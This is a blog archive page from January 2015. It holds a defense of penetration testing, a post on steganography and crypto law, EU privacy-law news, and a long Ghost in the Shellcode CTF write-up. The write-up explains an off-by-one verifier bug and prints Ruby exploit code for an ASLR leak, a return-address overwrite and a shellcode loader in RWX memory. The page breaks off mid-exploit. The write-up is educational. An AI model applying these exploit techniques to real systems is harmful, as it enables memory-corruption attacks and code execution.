Monthly Archives: January 2015

In Defense of Ethical Hacking

Pete Herzog, wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise is fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/) , gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here on my comments on Pete’s blog post titled “The Myth of Ethical Hacking (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/)”



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple different in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I this this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this, standard you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”, your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by that way software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
—Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.

Plausible Deniability – The Impact of Crypto Law

So, after the recent terror attacks in Paris, the UK suffered from the usual knee-jerk reactions from the technologically-challenged chaps we have governing us. “Let’s ban encryption the Government can’t crack”, they say. Many people mocked this, saying that terrorists were flouting laws anyway, so why would they obey the rules on crypto? How would companies that rely on crypto do business in the UK (that’s everyone, by the way)?


Well, I’m not going to dwell on those points, because I am rather late to the party in writing this piece, and because those points are boring :) In any case, if the Internet went all plaintext on us, web filtering would be a whole lot easier, and Smoothwall’s HTTPS features wouldn’t be quite so popular!


If the real intent of the law is to be able to arrest someone just for having, or sending encrypted data - the equivalent of arresting someone for looking funny (or stepping on the cracks in pavements). What would our miscreants do next?


Well, the idea we need to explore is “plausible deniability”. For example, you are a De Niro-esque mafia enforcer. You need to carry a baseball bat, for the commission of your illicit  work. If you want to be able to fool the local law enforcement, you might also carry a baseball. “i’m going to play baseball, officer” (may not go down well at 3 in the morning when you have a corpse in the back seat of your car, but it’s a start). You conceal your weapon among things that help it look normal. It is possible conceal the cryptography “weapon” so that law enforcement can’t see it’s there so they can’t arrest anyone. Is it possible to say “sorry officer, no AES256 here, just a picture of a kitteh”? If so, you have plausible deniability.

What’s the crypto equivalent? Steganography. The idea of hiding a message inside other data, such that it is very hard to prove a hidden message is there at all. Here’s an example:



This image of a slightly irritated looking cat in a shoebox contains a short message. It will be very hard to find, because the original image is only on my harddisk, so you have nothing to compare to. There are many steganographic methods for hiding the text, and it is extremely short by comparison to the image. If I had encrypted the text… well, you would find it even harder, because you couldn’t even look for words. It is left as an exercise for the reader to tell me in a comment what the message is.

Finland Introduces New Electronic Privacy Requirements for Online Communications Services Providers

On January 1, 2015, Finland’s Information Security Code (2014/ 917, the “Code”) became effective. The Code introduces substantial revisions to Finland’s existing electronic communications legislation and consolidates several earlier laws into a single, unified text. Although many of these earlier laws remain unchanged, the Code includes extensive amendments in a number of areas.

The most significant change is the broadened obligation to protect the confidentiality of communications, which previously applied only to telecommunications providers. Under the Code, this obligation applies to all providers of electronic communications services, such as instant messaging services and many online social networking tools. As a result of this change, providers of these services have an obligation to maintain the security and confidentiality of electronic messages sent over their systems.

Another important new provision allows for the extraterritorial application of the Code. Businesses that are established outside the EU, but offer their services in Finnish or otherwise target Finnish residents are, in theory, subject to the requirements of the Code. This is a similar approach to that taken in the forthcoming EU General Data Protection Regulation, which seeks to require businesses located outside the EU to comply with EU privacy laws if they (1) offer goods or services to EU residents, or (2) monitor the behavior of EU residents. How these extraterritoriality provisions will be enforced against businesses that have no assets in the EU remains an open question at this stage.

European Data Protection Supervisor Speaks on Data Protection Day

On January 28, 2015, in connection with Data Protection Day, newly appointed European Data Protection Supervisor (“EDPS”) Giovanni Buttarelli spoke about future challenges for data protection. Buttareli encouraged the EU “to lead by example as a beacon of respect for digital rights,” and “to be at the forefront in shaping a global, digital standard for privacy and data protection which centers on the rights of the individual.” Buttarelli stressed that in the context of global technological changes, “the EU has to make existing data protection rights more effective in practice, and to allow citizens to more easily exercise their rights.”

Buttarelli also gave his opinion on the “security versus right-to-privacy” debate, which has been the subject of intense discussions in the EU after the deadly attacks on Charlie l’Hebdo in France. While EU policymakers are debating new measures to tackle terrorism that implicate privacy, Buttarelli encouraged “legislators not to act on the basis of emotions and to consider the long term effects.” He stated that privacy is a fundamental right and that measures that undermine privacy in the name of security are lawful only after a showing that the measures are necessary and proportional to the privacy and security interests at issue.

Buttarelli also stated that he intends to work closely with EU institutions and assist their progress on multiple pending initiatives, including the EU Data Protection Reform package. According to Buttarelli, the ongoing legal uncertainty and fragmented data protection framework is not sustainable and is impacting citizens and businesses. The EDPS aims to assist legislators in enacting the EU Data Protection Reform package in order to reinforce EU privacy and data protection standards and promote a culture of data protection.

Read the interview with Buttarelli.

View the EDPS press release.

German DPAs Host Event Regarding U.S.-EU Safe Harbor Framework and Initiate Administrative Proceedings Against Two U.S. Companies

On January 28, 2015, the German conference of data protection commissioners hosted a European Data Protection Day event called Europe: Safer Harbor for Data Protection? – The Future Use of the Different Level of Data Protection between the EU and the US.

At the conference, the speakers discussed the validity of the U.S.-EU Safe Harbor Framework. Previously, in 2013, the German data protection commissioners stated that they would review whether to suspend data transfers made from Germany to the U.S. pursuant to the U.S.-EU Safe Harbor Framework. During the conference, it was revealed that the data protection commissioners initiated administrative proceedings against two U.S. companies in the German states of Berlin and Bremen with respect to their data transfers made pursuant to the U.S.-EU Safe Harbor Framework. At this time, the identities of the two U.S. companies are unknown. In addition, details are murky regarding the nature of the administrative proceedings, the theory of law being used by the commissioners to stop the data transfers, and the underlying facts that led to the administrative proceedings. The conference panels also discussed the comprehensive mass surveillance by U.S. intelligence agencies from a fundamental rights perspective, as well as these U.S. intelligence agencies’ access to information regarding EU data subjects.

We will update this blog post as we become aware of additional details.

GitS 2015: Giggles (off-by-one virtual machine)

Welcome to part 3 of my Ghost in the Shellcode writeup! Sorry for the delay, I actually just moved to Seattle. On a sidenote, if there are any Seattle hackers out there reading this, hit me up and let's get a drink!

Now, down to business: this writeup is about one of the Pwnage 300 levels; specifically, Giggles, which implements a very simple and very vulnerable virtual machine. You can download the binary here, the source code here (with my comments - I put XXX near most of the vulnerabilities and bad practices I noticed), and my exploit here.

One really cool aspect of this level was that they gave source code, a binary with symbols, and even a client (that's the last time I'll mention their client, since I dislike Python :) )! That means we could focus on exploitation and not reversing!

The virtual machine

I'll start by explaining how the virtual machine actually works. If you worked on this level yourself, or you don't care about the background, you can just skip over this section.

Basically, there are three operations: TYPE_ADDFUNC, TYPE_VERIFY, and TYPE_RUNFUNC.

The usual process is that the user adds a function using TYPE_ADDFUNC, which is made up of one (possibly zero?) or more operations. Then the user verifies the function, which checks for bounds violations and stuff like that. Then if that succeeds, the user can run the function. The function can take up to 10 arguments and output as much as it wants.

There are only seven different opcodes (types of operations), and one of the tricky parts is that none of them deal with absolute values—only other registers. They are:

  • OP_ADD reg1, reg2 - add two registers together, and store the result in reg1
  • OP_BR <addr> - branch (jump) to a particular instruction - the granularity of these jumps is actually per-instruction, not per-byte, so you can't jump into the middle of another instruction, which ruined my initial instinct :(
  • OP_BEQ <addr> <reg1> <reg2> / OP_BGT <addr> <reg1> <reg2> - branch if equal and branch if greater than are basically the same as OP_BR, except the jumps are conditional
  • OP_MOV <reg1> <reg2< - set reg1 to equal reg2
  • OP_OUT <reg> - output a register (gets returned as a hex value by RUNFUNC)
  • OP_EXIT - terminate the function

To expand on the output just a bit - the program maintains the output in a buffer that's basically a series of space-separated hex values. At the end of the program (when it either terminates or OP_EXIT is called), it's sent back to the client. I was initially worried that I would have to craft some hex-with-spaces shellcode, but thankfully that wasn't necessary. :)

There are 10 different registers that can be accessed. Each one is 32 bits. The operand values, however, are all 64-bit values.

The verification process basically ensures that the registers and the addresses are mostly sane. Once it's been validated, a flag is switched and the function can be called. If you call the function before verifying it, it'll fail immediately. If you can use arbitrary bytecode instructions, you'd be able to address register 1000000, say, and read/write elsewhere in memory. They wanted to prevent that.

Speaking of the vulnerability, the bug that leads to full code execution is in the verify function - can you find it before I tell you?

The final thing to mention is arguments: when you call TYPE_RUNFUNC, you can pass up to I think 10 arguments, which are 32-bit values that are placed in the first 8 registers.

Fixing the binary

I've gotten pretty efficient at patching binaries for CTFs! I've talked about this before, so I'll just mention what I do briefly.

I do these things immediately, before I even start working on the challenge:

  • Replace the call to alarm() with NOPs
  • Replace the call to fork() with "xor eax, eax", followed by NOPs
  • Replace the call to drop_privs() with NOPs
  • (if I can find it)

That way, the process won't be killed after a timeout, and I can debug it without worrying about child processes holding onto ports and other irritations. NOPing out drop_privs() means I don't have to worry about adding a user or running it as root or creating a folder for it. If you look at the objdump outputs diffed, here's what it looks like:

--- a   2015-01-27 13:30:29.000000000 -0800
+++ b   2015-01-27 13:30:31.000000000 -0800
@@ -1,5 +1,5 @@

-giggles:     file format elf64-x86-64
+giggles-fixed:     file format elf64-x86-64


 Disassembly of section .interp:
@@ -1366,7 +1366,10 @@
     125b:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
     125f:      75 02                   jne    1263 <loop+0x3d>
     1261:      eb 68                   jmp    12cb <loop+0xa5>
-    1263:      e8 b8 fc ff ff          call   f20 <fork@plt>
+    1263:      31 c0                   xor    eax,eax
+    1265:      90                      nop
+    1266:      90                      nop
+    1267:      90                      nop
     1268:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
     126b:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
     126f:      75 02                   jne    1273 <loop+0x4d>
@@ -1374,14 +1377,26 @@
     1273:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
     1277:      75 48                   jne    12c1 <loop+0x9b>
     1279:      bf 1e 00 00 00          mov    edi,0x1e
-    127e:      e8 6d fb ff ff          call   df0 <alarm@plt>
+    127e:      90                      nop
+    127f:      90                      nop
+    1280:      90                      nop
+    1281:      90                      nop
+    1282:      90                      nop
     1283:      48 8d 05 b6 1e 20 00    lea    rax,[rip+0x201eb6]        # 203140 <USER>
     128a:      48 8b 00                mov    rax,QWORD PTR [rax]
     128d:      48 89 c7                mov    rdi,rax
-    1290:      e8 43 00 00 00          call   12d8 <drop_privs_user>
+    1290:      90                      nop
+    1291:      90                      nop
+    1292:      90                      nop
+    1293:      90                      nop
+    1294:      90                      nop
     1295:      8b 45 ec                mov    eax,DWORD PTR [rbp-0x14]
     1298:      89 c7                   mov    edi,eax

I just use a simple hex editor on Windows, xvi32.exe, to take care of that. But you can do it in countless other ways, obviously.

What's wrong with verifyBytecode()?

Have you found the vulnerability yet?

I'll give you a hint: look at the comparison operators in this function:

int verifyBytecode(struct operation * bytecode, unsigned int n_ops)
{
    unsigned int i;
    for (i = 0; i < n_ops; i++)
    {
        switch (bytecode[i].opcode)
        {
            case OP_MOV:
            case OP_ADD:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                break;
            case OP_OUT:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                break;
            case OP_BR:
                if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;
            case OP_BEQ:
            case OP_BGT:
                if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand3 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;
            case OP_EXIT:
                break;
            default:
                return 0;
        }
    }
    return 1;
}

Notice how it checks every operation? It checks if the index is greater than the maximum value. That's an off-by-one error. Oops!

Information leak

There are actually a lot of small issues in this code. The first good one I noticed was actually that you can output one extra register. Here's what I mean (grab my exploit if you want to understand the API):

def demo()
  s = TCPSocket.new(SERVER, PORT)

  ops = []
  ops << create_op(OP_OUT, 10)
  add(s, ops)
  verify(s, 0)
  result = execute(s, 0, [])

  pp result
end

The output of that operation is:
"42fd35d8 "

Which, it turns out, is a memory address that's right after a "call" function. A return address!? Can it be this easy!?

It turns out that, no, it's not that easy. While I can read / write to that address, effectively bypasing ASLR, it turned out to be some left-over memory from an old call. I didn't even end up using that leak, either, I found a better one!

The actual vulnerabilitiy

After finding the off-by-one bug that let me read an extra register, I didn't really think much more about it. Later on, I came back to the verifyBytecode() function and noticed that the BR/BEQ/BGT instructions have the exact same bug! You can branch to the last instruction + 1, where it keeps running unverified memory as if it's bytecode!

What comes after the last instruction in memory? Well, it turns out to be a whole bunch of zeroes (00 00 00 00...), then other functions you've added, verified or otherwise. An instruction is 26 bytes long in memory (two bytes for the opcode, and three 64-bit operands), and the instruction "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" actually maps to "add reg0, reg0", which is nice and safe to do over and over again (although it does screw up the value in reg0).

Aligning the interpreter

At this point, it got a bit complicated. Sure, I'd found a way to break out of the sandbox to run unverified code, but it's not as straight forward as you might think.

The problem? The spacing of the different "functions" in memory (that is, groups of operations) aren't multiples of 26 bytes apart, thanks to headers, so if you break out of one function and into another, you wind up trying to execute bytecode that's somewhat offset.

In other words, if your second function starts at address 0, the interpreter tries to run the bytecode at -12 (give or take). The bytecode at -12 just happens to be the number of instructions in the function, so the first opcode is actually equal to the number of operations (so if you have three operations in the function, the first operation will be opcode 3, or BEQ). Its operands are bits and pieces of the opcodes and operands. Basically, it's a big mess.

To get this working, I wanted to basically just skip over that function altogether and run the third function (which would hopefully be a little better aligned). Basically, I wanted the function to do nothing dangerous, then continue on to the third function.

Here's the code I ended up writing (sorry the formatting isn't great, check out the exploit I linked above to see it better):

# This creates a valid-looking bytecode function that jumps out of bounds,
# then a non-validated function that puts us in a more usable bytecode
# escape
def init()
  puts("[*] Connecting to #{SERVER}:#{PORT}")
  s = TCPSocket.new(SERVER, PORT)
  #puts("[*] Connected!")

  ops = []

  # This branches to the second instruction - which doesn't exist
  ops << create_op(OP_BR, 1)
  add(s, ops)
  verify(s, 0)

  # This little section takes some explaining. Basically, we've escaped the bytecode
  # interpreter, but we aren't aligned properly. As a result, it's really irritating
  # to write bytecode (for example, the code of the first operation is equal to the
  # number of operations!)
  #
  # Because there are 4 opcodes below, it performs opcode 4, which is 'mov'. I ensure
  # that both operands are 0, so it does 'mov reg0, reg0'.
  #
  # After that, the next one is a branch (opcode 1) to offset 3, which effectively
  # jumps past the end and continues on to the third set of bytecode, which is out
  # ultimate payload.

  ops = []
  # (operand = count)
  #                  |--|               |---|                                          <-- inst1 operand1 (0 = reg0)
  #                          |--------|                    |----|                      <-- inst1 operand2 (0 = reg0)
  #                                                                        |--|        <-- inst2 opcode (1 = br)
  #                                                                  |----|            <-- inst2 operand1
  ops << create_op(0x0000, 0x0000000000000000, 0x4242424242000000, 0x00003d0001434343)
  #                  |--|              |----|                                          <-- inst2 operand1
  ops << create_op(0x0000, 0x4444444444000000, 0x4545454545454545, 0x4646464646464646)
  # The values of these don't matter, as long as we still have 4 instructions
  ops << create_op(0xBBBB, 0x4747474747474747, 0x4848484848484848, 0x4949494949494949)
  ops << create_op(0xCCCC, 0x4a4a4a4a4a4a4a4a, 0x4b4b4b4b4b4b4b4b, 0x4c4c4c4c4c4c4c4c)

  # Add them
  add(s, ops)

  return s
end

The comments explain it pretty well, but I'll explain it again. :)

The first opcode in the unverified function is, as I mentioned, equal to the number of operations. We create a function with 4 operations, which makes it a MOV instruction. Performing a MOV is pretty safe, especially since reg0 is already screwed up.

The two operands to instruction 1 are parts of the opcodes and operands of the first function. And the opcode for the second instruction is part of third operand in the first operation we create. Super confusing!

Effectively, this ends up running:

mov reg0, reg0
br 0x3d
; [bad instructions that get skipped]

I'm honestly not sure why I chose 0x3d as the jump distance, I suspect it's just a number that I was testing with that happened to work. The instructions after the BR don't matter, so I just fill them in with garbage that's easy to recognize in a debugger.

So basically, this function just does nothing, effectively, which is exactly what I wanted.

Getting back in sync

I hoped that the third function would run perfectly, but because of math, it still doesn't. However, the operation count no longer matters in the third function, which is good enough for me! After doing some experiments, I determined that the instructions are unaligned by 0x10 (16) bytes. If you pad the start with 0x10 bytes then add instructions as normal, they'll run completely unverified.

To build the opcodes for the third function, I added a parameter to the add() function that lets you offset things:

#[...]
  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 10 (that's how the math worked out)
  add(s, ops, 16)
#[...]

Now you can run entirely unverified bytecode instructions! That means full read/write/execute of arbitrary addresses relative to the base address of the registers array. That's awesome! Because the registers array is on the stack, we have read/write access relative to a stack address. That means you can trivially read/write the return address and leak addresses of the binary, libc, or anything you want. ASLR bypass and RIP control instantly!

Leaking addresses

There are two separate sets of addresses that need to be leaked. It turns out that even though ASLR is enabled, the addresses don't actually randomize between different connections, so I can leak addresses, reconnect, leak more addresses, reconnect, and run the exploit. It's not the cleanest way to solve the level, but it worked! If this didn't work, I could have written a simple multiplexer bytecode function that does all these things using the same function.

I mentioned I can trivially leak the binary address and a stack address. Here's how:

# This function leaks two addresses: a stack address and the address of
# the binary image (basically, defeating ASLR)
def leak_addresses()
  puts("[*] Bypassing ASLR by leaking stack/binary addresses")
  s = init()

  # There's a stack address at offsets 24/25
  ops = []
  ops << create_op(OP_OUT, 24)
  ops << create_op(OP_OUT, 25)

  # 26/27 is the return address, we'll use it later as well!
  ops << create_op(OP_OUT, 26)
  ops << create_op(OP_OUT, 27)

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 10 (that's how the math worked out)
  add(s, ops, 16)

  # Run the code
  result = execute(s, 0, [])

  # The result is a space-delimited array of hex values, convert it to
  # an array of integers
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the two values in and do the math to calculate them
  @@registers = ((a[1] << 32) | (a[0])) - 0xc0
  @@base_addr = ((a[3] << 32) | (a[2])) - 0x1efd

  # User output
  puts("[*] Found the base address of the register array: 0x#{@@registers.to_s(16)}")
  puts("[*] Found the base address of the binary: 0x#{@@base_addr.to_s(16)}")

  s.close
end

Basically, we output registers 24, 25, 26, and 27. Since the OUT function is 4 bytes, you have to call OUT twice to leak a 64-bit address.

Registers 24 and 25 are an address on the stack. The address is 0xc0 bytes above the address of the registers variable (which is the base address of our overflow, and therefore needed for calculating offsets), so we subtract that. I determined the 0xc0 value using a debugger.

Registers 26 and 27 are the return address of the current function, which happens to be 0x1efd bytes into the binary (determined with IDA). So we subtract that value from the result and get the base address of the binary.

I also found a way to leak a libc address here, but since I never got a copy of libc I didn't bother keeping that code around.

Now that we have the base address of the binary and the address of the registers, we can use the OUT and MOV operations, plus a little bit of math, to read and write anywhere in memory.

Quick aside: getting enough sleep

You may not know this, but I work through CTF challenges very slowly. I like to understand every aspect of everything, so I don't rush. My secret is, I can work tirelessly at these challenges until they're complete. But I'll never win a race.

I got to this point at around midnight, after working nearly 10 hours on this challenge. Most CTFers will wonder why it took 10 hours to get here, so I'll explain again: I work slowly. :)

The problem is, I forgot one very important fact: that the operands to each operation are all 64-bit values, even though the arguments and registers themselves are 32-bit. That means we can calculate an address from the register array to anywhere in memory. I thought they were 32 bit, however, and since the process is 64-bit Ii'd be able to read/write the stack, but not addresses the binary! That wasn't true, I could write anywhere, but I didn't know that. So I was trying a bunch of crazy stack stuff to get it working, but ultimately failed.

At around 2am I gave up and played video games for an hour, then finished the book I was reading. I went to bed about 3:30am, still thinking about the problem. Laying in bed about 4am, it clicked in that register numbers could be 64-bit, so I got up and finished it up for about 7am. :)

The moral of this story is: sometimes it pays to get some rest when you're struggling with a problem!

+rwx memory!?

The authors of the challenge must have been feeling extremely generous: they gave us a segment of memory that's readable, writeable, and executable! You can write code to it then run it! Here's where it's declared:

void * JIT;     // TODO: add code to JIT functions

//[...]

    /* Map 4096 bytes of executable memory */
    JIT = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

A pointer to the memory is stored in a global variable. Since we have the ability to read an arbitrary address—once I realized my 64-bit problem—it was pretty easy to read the pointer:

def leak_rwx_address()
  puts("[*] Attempting to leak the address of the mmap()'d +rwx memory...")
  s = init()

  # This offset is always constant, from the binary
  jit_ptr = @@base_addr + 0x20f5c0

  # Read both halves of the address - the read is relative to the stack-
  # based register array, and has a granularity of 4, hence the math
  # I'm doing here
  ops = []
  ops << create_op(OP_OUT, (jit_ptr - @@registers) / 4)
  ops << create_op(OP_OUT, ((jit_ptr + 4) - @@registers) / 4)
  ops << create_op(OP_EXIT)
  add(s, ops, 16)
  result = execute(s, 0, [])

  # Convert the result from a space-delimited hex list to an integer array
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the address
  @@rwx_addr = ((a[1] << 32) | (a[0]))

  # User output
  puts("[*] Found the +rwx memory: 0x#{@@rwx_addr.to_s(16)}")

  s.close
end

Basically, we know the pointer to the JIT code is at the base_addr + 0x20f5c0 (determined with IDA). So we do some math with that address and the base address of the registers array (dividing by 4 because that's the width of each register).

Finishing up

Now that we can run arbitrary bytecode instructions, we can read, write, and execute any address. But there was one more problem: getting the code into the JIT memory.

It seems pretty straight forward, since we can write to arbitrary memory, but there's a problem: you don't have any absolute values in the assembly language, which means I can't directly write a bunch of values to memory. What I could do, however, is write values from registers to memory, and I can set the registers by passing in arguments.

BUT, reg0 gets messed up and two registers are wasted because I have to use them to overwrite the return address. That means I have 7 32-bit registers that I can use.

What you're probably thinking is that I can implement a multiplexer in their assembly language. I could have some operands like "write this dword to this memory address" and build up the shellcode by calling the function multiple times with multiple arguments.

If you're thinking that, then you're sharper than I was at 7am with no sleep! I decided that the best way was to write a shellcode loader in 24 bytes. I actually love writing short, custom-purpose shellcode, there's something satisfying about it. :)

Here's my loader shellcode:

  # Create some loader shellcode. I'm not proud of this - it was 7am, and I hadn't
  # slept yet. I immediately realized after getting some sleep that there was a
  # way easier way to do this...
  params =
    # param0 gets overwritten, just store crap there
    "\x41\x41\x41\x41" +

    # param1 + param2 are the return address
    [@@rwx_addr & 0x00000000FFFFFFFF, @@rwx_addr >> 32].pack("II") +

    # ** Now, we build up to 24 bytes of shellcode that'll load the actual shellcode

    # Decrease ECX to a reasonable number (somewhere between 200 and 10000, doesn't matter)
    "\xC1\xE9\x10" +  # shr ecx, 10

    # This is where the shellcode is read from - to save a couple bytes (an absolute move is 10
    # bytes long!), I use r12, which is in the same image and can be reached with a 4-byte add
    "\x49\x8D\xB4\x24\x88\x2B\x20\x00" + # lea rsi,[r12+0x202b88]

    # There is where the shellcode is copied to - immediately after this shellcode
    "\x48\xBF" + [@@rwx_addr + 24].pack("Q") + # mov rdi, @@rwx_addr + 24

    # And finally, this moves the bytes over
    "\xf3\xa4" # rep movsb

  # Pad the shellcode with NOP bytes so it can be used as an array of ints
  while((params.length % 4) != 0)
    params += "\x90"
  end

  # Convert the shellcode to an array of ints
  params = params.unpack("I*")

Basically, the first three arguments are wasted (the first gets messed up and the next two are the return address). Then we set up a call to "rep movsb", with rsi, rdi, and rcx set appropriately (and complicatedly). You can see how I did that in the comments. All told, it's 23 bytes of machine code.

It took me a lot of time to get that working, though! Squeezing out every single byte! It basically copies the code from the next bytecode function (whose address I can calculate based on r12) to the address immediately after itself in the +RWX memory (which I can leak beforehand).

This code is written to the +RWX memory using these operations:

  ops = []

  # Overwrite teh reteurn address with the first two operations
  ops << create_op(OP_MOV, 26, 1)
  ops << create_op(OP_MOV, 27, 2)

  # This next bunch copies shellcode from the arguments into the +rwx memory
  ops << create_op(OP_MOV, ((@@rwx_addr + 0) - @@registers) / 4, 3)
  ops << create_op(OP_MOV, ((@@rwx_addr + 4) - @@registers) / 4, 4)
  ops << create_op(OP_MOV, ((@@rwx_addr + 8) - @@registers) / 4, 5)
  ops << create_op(OP_MOV, ((@@rwx_addr + 12) - @@registers) / 4, 6)
  ops << create_op(OP_MOV, ((@@rwx_addr + 16) - @@registers) / 4, 7)
